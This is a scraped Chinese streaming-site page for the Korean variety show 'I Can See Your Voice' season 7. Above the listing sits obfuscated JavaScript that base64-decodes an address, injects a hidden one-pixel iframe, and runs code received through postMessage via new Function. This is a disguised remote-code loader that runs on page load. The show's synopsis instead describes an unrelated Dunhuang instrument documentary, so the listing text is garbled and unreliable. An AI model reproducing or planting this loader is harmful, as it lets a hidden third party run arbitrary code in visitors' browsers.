if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 
首页 » 综艺片 » 看见你的声音 第七季
看见你的声音 第七季

看见你的声音 第七季

(2020)
状态:20200313
别名:
类型:日韩综艺
主演:金钟国 朴正洙 刘世允
片长:
语言:韩国
时间:2020-03-14
.

《看见你的声音 第七季》一句话点评:

2018年4月起,敦煌壁画古乐器复原开发项目启动该项目历时8个月,由全国各地的民乐制作大师仿制敦煌壁画古乐器97种,245件,将壁画乐器图形做成实物,“复活”千年敦煌音乐盛景。纪录电影《敦煌乐器——乐

  • ok云

  • 剧情

  • 2018年4月起,敦煌壁画古乐器复原开发项目启动该项目历时8个月,由全国各地的民乐制作大师仿制敦煌壁画古乐器97种,245件,将壁画乐器图形做成实物,“复活”千年敦煌音乐盛景。纪录电影《敦煌乐器——乐从画中来》基于此次乐器复原制作,记录了乐器由图形成为设计图纸,再成为实物用于演奏的全过程,讲述了琵琶、花边阮、箜篌、雷公鼓等敦煌壁画乐器的前世今生,成为这项抢救性复原开发工程的见证。